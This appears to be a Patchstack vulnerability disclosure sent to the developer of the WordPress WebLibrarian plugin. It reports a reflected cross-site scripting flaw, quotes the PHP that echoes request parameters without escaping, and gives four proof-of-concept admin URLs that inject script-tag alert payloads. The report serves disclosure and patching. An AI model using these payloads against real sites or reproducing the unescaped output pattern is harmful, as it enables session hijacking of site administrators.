LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WebLibrarian Plugin to Patchstack.
See tips for patching this kind of vulnerabilityRXSS vulnerability occurs from line 643 to line 653 in display_bulk_upload_form() of the weblibrarian/includes/WEBLIB_Patrons_Admin.php file.
function display_bulk_upload_form($returnURL) {
if ( isset($_REQUEST['paged']) ) {
?><input type="hidden" name="paged" value="<?php echo $_REQUEST['paged'] ?>" /><?php
}
if ( isset($_REQUEST['screen-options-apply']) ) {
?><input type="hidden" name="screen-options-apply" value="<?php echo $_REQUEST['screen-options-apply'] ?>" /><?php
}
if ( isset($_REQUEST['wp_screen_options']['option']) ) {
?><input type="hidden" name="wp_screen_options[option]" value="<?php echo $_REQUEST['wp_screen_options']['option'] ?>" /><?php
}
if ( isset($_REQUEST['wp_screen_options']['value']) ) {
?><input type="hidden" name="wp_screen_options[value]" value="<?php echo $_REQUEST['wp_screen_options']['value'] ?>" /><?php
}
paged, screen-options-apply, wp_screen_options, option, wp_screen_options, value
Additional vulnerable endpoint :
[+] PoC 01 :
http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-collection&paged=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&screen-options-apply=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&wp_screen_options%5Boption%5D=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3Ewp_screen_options%5Bvalue%5D%3D%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E
[+] PoC 02 :
http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-collection-bulk&paged=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&screen-options-apply=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&wp_screen_options%5Boption%5D=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3Ewp_screen_options%5Bvalue%5D%3D%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E
[+] PoC 3:
http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-collection&barcode=123&title=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&itemauthor=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&subject=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&description=1&itemcategory=%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&media=%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&publisher=%22%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&publocation=%22%3E%3Cscript%3Ealert%287%29%3C%2Fscript%3E&pubdate=Jan%2F1%2F2023&edition=%22%3E%3Cscript%3Ealert%288%29%3C%2Fscript%3E&isbn=1&type=1&thumburl=1&callnumber=%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E&keywordlist&newkeyword&additem=Add+New+Item
[+] PoC 4 :
http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-type&typename="><script>alert(1)</script>&loanperiod=14&addtype=Add+New+Type
See researcher files below
To make the patching process easier and safer for all users, we recommend reading our memo about the most common vulnerabilities and the way these can be fixed. If you need help understanding some of the security concepts, don’t worry. That’s when we step in and help.
Please send us the patched version or code before releasing it, so we could help you avoid incomplete patches that could lead to inconveniences. Don’t delay security patch releases for other non-security updates. Ideally, security fixes would be released separately so users could update ASAP without fear of anything breaking. You can also join the free Patchstack mVDP program to have better control over the vulnerability patching and disclosure process.